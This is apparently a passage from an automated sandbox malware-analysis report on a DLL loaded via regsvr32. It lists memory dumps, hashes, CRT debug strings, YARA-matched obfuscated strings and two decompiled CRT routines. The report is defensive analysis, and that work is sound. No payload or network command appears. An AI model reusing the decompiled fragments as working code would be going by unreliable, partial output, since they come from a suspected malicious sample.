                                                  • Associated: 00000003.00000002.926274348.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926337825.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                  Similarity
                                                  • API ID: DestroyHeap
                                                  • String ID:
                                                  • API String ID: 2435110975-0
                                                  • Opcode ID: f7b981f9b1b51933cf7e1d9a1baddea90378982ce7575ce50583c327d4fc7a8e
                                                  • Instruction ID: df5636f5ee55eb5a1123ad47329e94e2a1af4504a4e9b44811c9c5941fd1bffd
                                                  • Opcode Fuzzy Hash: f7b981f9b1b51933cf7e1d9a1baddea90378982ce7575ce50583c327d4fc7a8e
                                                  • Instruction Fuzzy Hash: 6CC04C64D15A01C1EA445726FC8536822A06394745FA0C021C5CD012308B2F55968701
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926240012.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                  • Associated: 00000003.00000002.926236480.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926256789.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926274348.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926337825.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                  Similarity
                                                  • API ID: EncodePointer
                                                  • String ID:
                                                  • API String ID: 2118026453-0
                                                  • Opcode ID: 486166b47cec33101184f167bfa082c8d21519f5c79393c344b51e77eb7d9bd4
                                                  • Instruction ID: 5c830059afc01ab3dffeb0f702370a5898bb96dd38ab511ff450623a486f5942
                                                  • Opcode Fuzzy Hash: 486166b47cec33101184f167bfa082c8d21519f5c79393c344b51e77eb7d9bd4
                                                  • Instruction Fuzzy Hash: F1A00224F16591D7DAAC373A5D9713D11A06B68709FF05869C74F40261CE2F92FE8B05
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926240012.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                  • Associated: 00000003.00000002.926236480.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926256789.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926274348.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926337825.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                  Similarity
                                                  • API ID: _invoke_watson_if_error$DebugOutputString$_invoke_watson_if_oneof$_itow_s_snwprintf_s_unlock_wcsftime_l
                                                  • String ID: %s(%d) : %s$(*_errno())$, Line $<file unknown>$Assertion failed!$Assertion failed: $P$Second Chance Assertion Failed: File $_CrtDbgReport: String too long or IO Error$_CrtDbgReport: String too long or Invalid characters in String$_VCrtDbgReportW$_itow_s(nLine, szLineMessage, 4096, 10)$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\dbgrptt.c$strcpy_s(szOutMessage2, 4096, "_CrtDbgReport: String too long or Invalid characters in String")$wcscat_s(szLineMessage, 4096, L"\n")$wcscat_s(szLineMessage, 4096, L"\r")$wcscat_s(szLineMessage, 4096, szUserMessage)$wcscpy_s(szLineMessage, 4096, szFormat ? L"Assertion failed: " : L"Assertion failed!")$wcscpy_s(szOutMessage, 4096, L"_CrtDbgReport: String too long or IO Error")$wcscpy_s(szUserMessage, 4096, L"_CrtDbgReport: String too long or IO Error")$wcstombs_s(&ret, szaOutMessage, 4096, szOutMessage, ((size_t)-1))$wcstombs_s(((void *)0), szOutMessage2, 4096, szOutMessage, ((size_t)-1))
                                                  • API String ID: 4197005980-4190456261
                                                  • Opcode ID: 4879bfb960a2721f9666c96030d6b34d6758162388cb50bc2d04b6b5102aed05
                                                  • Instruction ID: 631fc2af3d1e2e358681470289229c30ebeab24735d73449bcceef6109dc099e
                                                  • Opcode Fuzzy Hash: 4879bfb960a2721f9666c96030d6b34d6758162388cb50bc2d04b6b5102aed05
                                                  • Instruction Fuzzy Hash: 6B421031A0CA8685EBB0CB14E8547EE73E4F784345FA04226D6CD43AA9DF7EE549CB41
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926240012.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                  • Associated: 00000003.00000002.926236480.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926256789.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926274348.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926337825.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                  Similarity
                                                  • API ID: Pointer$Decode$AddressEncodeLibraryLoadProc
                                                  • String ID: GetActiveWindow$GetLastActivePopup$GetProcessWindowStation$GetUserObjectInformationA$MessageBoxA$USER32.DLL
                                                  • API String ID: 2256938910-232180764
                                                  • Opcode ID: 7f66a9951f4a4371a03f8907a7d8dae5388e10f0167802e39e15e0e0cc6986ee
                                                  • Instruction ID: c20bf9db26653c31616cb8f8a39641649b62d884e8934e9a70f617ae2971618d
                                                  • Opcode Fuzzy Hash: 7f66a9951f4a4371a03f8907a7d8dae5388e10f0167802e39e15e0e0cc6986ee
                                                  • Instruction Fuzzy Hash: 9A81C631A19B8686E7A09B19FC4436EB3E0F784755F608135DACE426B8DF7EE448CB41
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926240012.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                  • Associated: 00000003.00000002.926236480.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926256789.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926274348.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926337825.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: Client hook re-allocation failure at file %hs line %d.$Client hook re-allocation failure.$Error: memory allocation: bad memory block type.$Error: memory allocation: bad memory block type.Memory allocated at %hs(%d).$Error: possible heap corruption at or near 0x%p$Invalid allocation size: %Iu bytes.$Invalid allocation size: %Iu bytes.Memory allocated at %hs(%d).$The Block at 0x%p was allocated by aligned routines, use _aligned_realloc()$_CrtCheckMemory()$_CrtIsValidHeapPointer(pUserData)$_pFirstBlock == pOldBlock$_pLastBlock == pOldBlock$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\dbgheap.c$fRealloc || (!fRealloc && pNewBlock == pOldBlock)$pOldBlock->nLine == IGNORE_LINE && pOldBlock->lRequest == IGNORE_REQ
                                                  • API String ID: 0-1181733849
                                                  • Opcode ID: 0b4b4e85d1eb3ae1a0b395440fade81dc617beeaf4b680a727513a857c3a72e7
                                                  • Instruction ID: c027552587c484905274aa3c7dfc2130a2bba284c4db387798f357193d3a2f5b
                                                  • Opcode Fuzzy Hash: 0b4b4e85d1eb3ae1a0b395440fade81dc617beeaf4b680a727513a857c3a72e7
                                                  • Instruction Fuzzy Hash: B3421035A0DB8685EBA08B69E88076E77E0F785794F214136DADD83BB4DB7ED440CB01
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Strings
                                                  • pHead->nLine == IGNORE_LINE && pHead->lRequest == IGNORE_REQ, xrefs: 000007FEF9D257E9
                                                  • HEAP CORRUPTION DETECTED: after %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory after end of heap buffer.Memory allocated at %hs(%d)., xrefs: 000007FEF9D2573C
                                                  • HEAP CORRUPTION DETECTED: before %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory before start of heap buffer.Memory allocated at %hs(%d)., xrefs: 000007FEF9D25620
                                                  • The Block at 0x%p was allocated by aligned routines, use _aligned_free(), xrefs: 000007FEF9D2542B
                                                  • HEAP CORRUPTION DETECTED: after %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory after end of heap buffer., xrefs: 000007FEF9D2579F
                                                  • Client hook free failure., xrefs: 000007FEF9D254A0
                                                  • f:\dd\vctools\crt_bld\self_64_amd64\crt\src\dbgheap.c, xrefs: 000007FEF9D254F7, 000007FEF9D2556D, 000007FEF9D257FE
                                                  • _BLOCK_TYPE_IS_VALID(pHead->nBlockUse), xrefs: 000007FEF9D25558
                                                  • _CrtIsValidHeapPointer(pUserData), xrefs: 000007FEF9D254E2
                                                  • HEAP CORRUPTION DETECTED: before %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory before start of heap buffer., xrefs: 000007FEF9D25683
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926240012.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                  • Associated: 00000003.00000002.926236480.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926256789.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926274348.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926337825.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                  Similarity
                                                  • API ID: HeapPointerValid_free_base
                                                  • String ID: Client hook free failure.$HEAP CORRUPTION DETECTED: after %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory after end of heap buffer.$HEAP CORRUPTION DETECTED: after %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory after end of heap buffer.Memory allocated at %hs(%d).$HEAP CORRUPTION DETECTED: before %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory before start of heap buffer.$HEAP CORRUPTION DETECTED: before %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory before start of heap buffer.Memory allocated at %hs(%d).$The Block at 0x%p was allocated by aligned routines, use _aligned_free()$_BLOCK_TYPE_IS_VALID(pHead->nBlockUse)$_CrtIsValidHeapPointer(pUserData)$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\dbgheap.c$pHead->nLine == IGNORE_LINE && pHead->lRequest == IGNORE_REQ
                                                  • API String ID: 1656799702-182684663
                                                  • Opcode ID: 708cd418722caba3a196df14d36aa04cdda5776576cdf5b3aec82fe9c7f2493c
                                                  • Instruction ID: 30c4da0a101ad128366c20b2541b857d1a248eb6f856515bedc9f5e1dcd2840f
                                                  • Opcode Fuzzy Hash: 708cd418722caba3a196df14d36aa04cdda5776576cdf5b3aec82fe9c7f2493c
                                                  • Instruction Fuzzy Hash: 58C16E36A18B4586EBA48B59E88076EB7E0F785790F614536EACD43BB4DB7ED401CB00
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  • HEAP CORRUPTION DETECTED: after %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory after end of heap buffer.Memory allocated at %hs(%d)., xrefs: 000007FEF9D25FE7
                                                  • _heapchk fails with _HEAPBADNODE., xrefs: 000007FEF9D25D19
                                                  • HEAP CORRUPTION DETECTED: after %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory after end of heap buffer., xrefs: 000007FEF9D26030
                                                  • _heapchk fails with _HEAPBADEND., xrefs: 000007FEF9D25D4D
                                                  • _1, xrefs: 000007FEF9D261FC
                                                  • %hs located at 0x%p is %Iu bytes long.Memory allocated at %hs(%d)., xrefs: 000007FEF9D2617C
                                                  • HEAP CORRUPTION DETECTED: on top of Free block at 0x%p.CRT detected that the application wrote to a heap buffer that was freed.Memory allocated at %hs(%d)., xrefs: 000007FEF9D260C7
                                                  • _heapchk fails with unknown return value!, xrefs: 000007FEF9D25DAF
                                                  • DAMAGED, xrefs: 000007FEF9D25E7D
                                                  • HEAP CORRUPTION DETECTED: before %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory before start of heap buffer.Memory allocated at %hs(%d)., xrefs: 000007FEF9D25EF9
                                                  • HEAP CORRUPTION DETECTED: on top of Free block at 0x%p.CRT detected that the application wrote to a heap buffer that was freed., xrefs: 000007FEF9D260FA
                                                  • _heapchk fails with _HEAPBADPTR., xrefs: 000007FEF9D25D7E
                                                  • _heapchk fails with _HEAPBADBEGIN., xrefs: 000007FEF9D25CE5
                                                  • HEAP CORRUPTION DETECTED: before %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory before start of heap buffer., xrefs: 000007FEF9D25F42
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926240012.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                  • Associated: 00000003.00000002.926236480.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926256789.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926274348.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926337825.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: %hs located at 0x%p is %Iu bytes long.Memory allocated at %hs(%d).$DAMAGED$HEAP CORRUPTION DETECTED: after %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory after end of heap buffer.$HEAP CORRUPTION DETECTED: after %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory after end of heap buffer.Memory allocated at %hs(%d).$HEAP CORRUPTION DETECTED: before %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory before start of heap buffer.$HEAP CORRUPTION DETECTED: before %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory before start of heap buffer.Memory allocated at %hs(%d).$HEAP CORRUPTION DETECTED: on top of Free block at 0x%p.CRT detected that the application wrote to a heap buffer that was freed.$HEAP CORRUPTION DETECTED: on top of Free block at 0x%p.CRT detected that the application wrote to a heap buffer that was freed.Memory allocated at %hs(%d).$_heapchk fails with _HEAPBADBEGIN.$_heapchk fails with _HEAPBADEND.$_heapchk fails with _HEAPBADNODE.$_heapchk fails with _HEAPBADPTR.$_heapchk fails with unknown return value!$_1
                                                  • API String ID: 0-510578482
                                                  • Opcode ID: 15b327a6fa8e12693a207a0a7b33494fdffa5f56c7c2417c86fde08a07b35573
                                                  • Instruction ID: 2e3929c610d79aeb9f6375ea398ef70322b77c1420209f8d6f9956d4446a531d
                                                  • Opcode Fuzzy Hash: 15b327a6fa8e12693a207a0a7b33494fdffa5f56c7c2417c86fde08a07b35573
                                                  • Instruction Fuzzy Hash: A6E13F36A18B5586EBA4CB69E88072EB7E0F384754F614526EACD43BB4DB7ED051CB00
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926206063.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: E$#r5|$:B)$:F&$Jq-.$K$K$Y]$kJ$kJ$sg
                                                  • API String ID: 0-2241473280
                                                  • Opcode ID: cddb9e216d5522f206da78d8fc0cd1a272e9a6010eb05564972df6001c09f508
                                                  • Instruction ID: 9c682bca3309bc02ed949a6de7aa3bb6d22b0761abc13177b84899e0b503d48e
                                                  • Opcode Fuzzy Hash: cddb9e216d5522f206da78d8fc0cd1a272e9a6010eb05564972df6001c09f508
                                                  • Instruction Fuzzy Hash: 73E2E4715047CC8BDBB9DFA4C8897DD3BA1FB44344F10861AEC4EAE250DBB45A89CB61
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 57%
                                                  			E000007FE7FEF9D23280(void* __eax, signed int __ecx, signed int __edx, signed int __rcx, signed int __rdx, void* __r8) {
                                                  				void* _t7;
                                                  				void* _t10;
                                                  				signed long long _t15;
                                                  				signed long long* _t16;
                                                  				signed long long _t20;
                                                  				signed long long _t24;
                                                  
                                                  				_t7 = __rcx -  *0xf9d4b018; // 0x6eb881abeeac
                                                  				if (_t7 != 0) goto 0xf9d2329a;
                                                  				asm("dec eax");
                                                  				if ((__ecx & 0x0000ffff) != 0) goto 0xf9d23296;
                                                  				asm("repe ret");
                                                  				asm("dec eax");
                                                  				goto 0xf9d23720;
                                                  				asm("int3");
                                                  				asm("int3");
                                                  				asm("int3");
                                                  				asm("int3");
                                                  				asm("int3");
                                                  				asm("int3");
                                                  				asm("int3");
                                                  				asm("o16 nop [eax+eax]");
                                                  				if (__r8 - 8 < 0) goto 0xf9d2330c;
                                                  				_t20 = __rdx * 0x1010101;
                                                  				_t10 = __r8 - 0x40;
                                                  				if (_t10 < 0) goto 0xf9d232ee;
                                                  				_t15 =  ~__rcx;
                                                  				if (_t10 == 0) goto 0xf9d232de;
                                                  				 *__rcx = _t20;
                                                  				_t16 = _t15 + __rcx;
                                                  				if (_t10 != 0) goto 0xf9d23327;
                                                  				_t24 = __r8 - _t15 & 7;
                                                  				if (_t10 == 0) goto 0xf9d2330c;
                                                  				 *_t16 = _t20;
                                                  				if (_t10 != 0) goto 0xf9d23300;
                                                  				if (_t24 == 0) goto 0xf9d2331b;
                                                  				_t16[1] = __edx & 0x000000ff;
                                                  				if (_t24 - 1 != 0) goto 0xf9d23311;
                                                  				return __eax;
                                                  			}









                                                  0x7fef9d23280
                                                  0x7fef9d23287
                                                  0x7fef9d23289
                                                  0x7fef9d23292
                                                  0x7fef9d23294
                                                  0x7fef9d23296
                                                  0x7fef9d2329a
                                                  0x7fef9d2329f
                                                  0x7fef9d232a0
                                                  0x7fef9d232a1
                                                  0x7fef9d232a2
                                                  0x7fef9d232a3
                                                  0x7fef9d232a4
                                                  0x7fef9d232a5
                                                  0x7fef9d232a6
                                                  0x7fef9d232b7
                                                  0x7fef9d232c6
                                                  0x7fef9d232ca
                                                  0x7fef9d232ce
                                                  0x7fef9d232d0
                                                  0x7fef9d232d6
                                                  0x7fef9d232db
                                                  0x7fef9d232de
                                                  0x7fef9d232ec
                                                  0x7fef9d232f1
                                                  0x7fef9d232f9
                                                  0x7fef9d23300
                                                  0x7fef9d2330a
                                                  0x7fef9d2330f
                                                  0x7fef9d23311
                                                  0x7fef9d23319
                                                  0x7fef9d2331b

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926240012.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                  • Associated: 00000003.00000002.926236480.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926256789.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926274348.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926337825.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                  Similarity
                                                  • API ID: ExceptionFilterProcessUnhandled$CaptureContextCurrentDebuggerEntryFunctionLookupPresentTerminateUnwindVirtual
                                                  • String ID:
                                                  • API String ID: 3778485334-0
                                                  • Opcode ID: c7ac20398f1e0bfcda68d30e042a710a2d00de73d3b00f2192fd5d70b0bf2831
                                                  • Instruction ID: 807cfb07a33e429e3d371e20a7d7f9b872ed56a9d2d7ce20ec260cf370a1508c
                                                  • Opcode Fuzzy Hash: c7ac20398f1e0bfcda68d30e042a710a2d00de73d3b00f2192fd5d70b0bf2831
                                                  • Instruction Fuzzy Hash: 9B31B435908B4685EAA09B69FD443AEB3E0F784794F608026DACD43775DF7EE0588B41
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926240012.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                  • Associated: 00000003.00000002.926236480.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926256789.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926274348.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926337825.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                  Similarity
                                                  • API ID: _unlock
                                                  • String ID: Client hook allocation failure at file %hs line %d.$Client hook allocation failure.$Invalid allocation size: %Iu bytes.$_CrtCheckMemory()$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\dbgheap.c
                                                  • API String ID: 2480363372-3680694803
                                                  • Opcode ID: 5582fb477a99f139482b647e65eadd7bcea0024aa5ad3136cc4be02f6e7bf908
                                                  • Instruction ID: 8b5a52ed6c75746639c18038ef7af0115634e61e6ce836c346e70c61fc8f1b15
                                                  • Opcode Fuzzy Hash: 5582fb477a99f139482b647e65eadd7bcea0024aa5ad3136cc4be02f6e7bf908
                                                  • Instruction Fuzzy Hash: 58510931A096828AE7F48B68EC4576E73E4F395354F618135DADD83BB4EB3EE4448B01
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926206063.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: #X$ $A2>$Mum$vQ$=D$Fa
                                                  • API String ID: 0-1298193321
                                                  • Opcode ID: 982ab4627d106152f76a325de243923c319ce5c47f351cfe718817436c28ee1d
                                                  • Instruction ID: 1349cc56659c19f01a369150ff0067e3f34eaebe01bc07430d2f97da03610ed5
                                                  • Opcode Fuzzy Hash: 982ab4627d106152f76a325de243923c319ce5c47f351cfe718817436c28ee1d
                                                  • Instruction Fuzzy Hash: 24522775A0620CDFCB68DFA8D08A6DDBBF2EF58344F104119F816A7261D7B0D919CB89
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926206063.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: ._$8%Y$@4<$F+}$R1$t$xy
                                                  • API String ID: 0-3078009748
                                                  • Opcode ID: 7cd976f9c86f50bd1c1ca064b29a615496490d447d7d5288ee1f6aa5414266f6
                                                  • Instruction ID: 0e1afbee3b71ea3b5863fe80692b11929ebce18e29255cef2241f67d7a77c22f
                                                  • Opcode Fuzzy Hash: 7cd976f9c86f50bd1c1ca064b29a615496490d447d7d5288ee1f6aa5414266f6
                                                  • Instruction Fuzzy Hash: 0402E1B1504649DFCB98DF28C489ADE3BE1FB48318F41812AFC4A9B764D770DA98CB45
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 33%
                                                  			E000007FE7FEF9D2BE50(intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esp, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a24) {
                                                  				intOrPtr _v4;
                                                  				void* _v12;
                                                  				signed long long _v24;
                                                  				signed int _v36;
                                                  				long long _v180;
                                                  				long long _v184;
                                                  				intOrPtr _v192;
                                                  				char _v196;
                                                  				intOrPtr _v204;
                                                  				long _v212;
                                                  				long long _v220;
                                                  				long long _v228;
                                                  				long long _v1212;
                                                  				long long _v1308;
                                                  				char _v1460;
                                                  				char _v1476;
                                                  				char _v1484;
                                                  				int _v1492;
                                                  				long long _v1500;
                                                  				long long _v1508;
                                                  				long long _v1516;
                                                  				long long _v1524;
                                                  				long long _v1532;
                                                  				long long _v1540;
                                                  				void* _t51;
                                                  				signed long long _t80;
                                                  				long long _t85;
                                                  				void* _t100;
                                                  
                                                  				_a24 = r8d;
                                                  				_a16 = __edx;
                                                  				_a8 = __ecx;
                                                  				_t80 =  *0xf9d4b018; // 0x6eb881abeeac
                                                  				_v24 = _t80 ^ _t100 - 0x00000610;
                                                  				if (_a8 == 0xffffffff) goto 0xf9d2be8d;
                                                  				E000007FE7FEF9D28D90(_t51, _a8);
                                                  				_v184 = 0;
                                                  				memset(__edi, 0, 0x94 << 0);
                                                  				_v1508 =  &_v196;
                                                  				_v1500 =  &_v1460;
                                                  				_v1492 = 0;
                                                  				_v212 = 0;
                                                  				__imp__RtlCaptureContext();
                                                  				_t85 = _v1212;
                                                  				_v220 = _t85;
                                                  				r8d = 0;
                                                  				0xf9d40e28();
                                                  				_v228 = _t85;
                                                  				if (_v228 == 0) goto 0xf9d2bf64;
                                                  				_v1516 = 0;
                                                  				_v1524 =  &_v1476;
                                                  				_v1532 =  &_v1484;
                                                  				_v1540 =  &_v1460;
                                                  				0xf9d40e22();
                                                  				goto 0xf9d2bf84;
                                                  				_v1212 = _v12;
                                                  				_v1308 =  &_v12;
                                                  				_v196 = _a4;
                                                  				_v192 = _a12;
                                                  				_v180 = _v12;
                                                  				_v1492 = IsDebuggerPresent();
                                                  				SetUnhandledExceptionFilter(??);
                                                  				_v212 = UnhandledExceptionFilter(??);
                                                  				if (_v212 != 0) goto 0xf9d2bffb;
                                                  				if (_v1492 != 0) goto 0xf9d2bffb;
                                                  				if (_v4 == 0xffffffff) goto 0xf9d2bffb;
                                                  				return E000007FE7FEF9D23280(E000007FE7FEF9D28D90(_t59, _v4), _v4, __edx, _v36 ^ _t100 - 0x00000610, _v204, _v220);
                                                  			}































                                                  0x7fef9d2be50
                                                  0x7fef9d2be55
                                                  0x7fef9d2be59
                                                  0x7fef9d2be65
                                                  0x7fef9d2be6f
                                                  0x7fef9d2be7f
                                                  0x7fef9d2be88
                                                  0x7fef9d2be8d
                                                  0x7fef9d2beaa
                                                  0x7fef9d2beb4
                                                  0x7fef9d2bebe
                                                  0x7fef9d2bec3
                                                  0x7fef9d2becb
                                                  0x7fef9d2bedb
                                                  0x7fef9d2bee1
                                                  0x7fef9d2bee9
                                                  0x7fef9d2bef1
                                                  0x7fef9d2bf04
                                                  0x7fef9d2bf09
                                                  0x7fef9d2bf1a
                                                  0x7fef9d2bf1c
                                                  0x7fef9d2bf2a
                                                  0x7fef9d2bf34
                                                  0x7fef9d2bf3e
                                                  0x7fef9d2bf5d
                                                  0x7fef9d2bf62
                                                  0x7fef9d2bf6c
                                                  0x7fef9d2bf7c
                                                  0x7fef9d2bf8b
                                                  0x7fef9d2bf99
                                                  0x7fef9d2bfa8
                                                  0x7fef9d2bfb6
                                                  0x7fef9d2bfbc
                                                  0x7fef9d2bfcd
                                                  0x7fef9d2bfdc
                                                  0x7fef9d2bfe3
                                                  0x7fef9d2bfed
                                                  0x7fef9d2c013

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926240012.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                  • Associated: 00000003.00000002.926236480.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926256789.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926274348.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926337825.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                  Similarity
                                                  • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
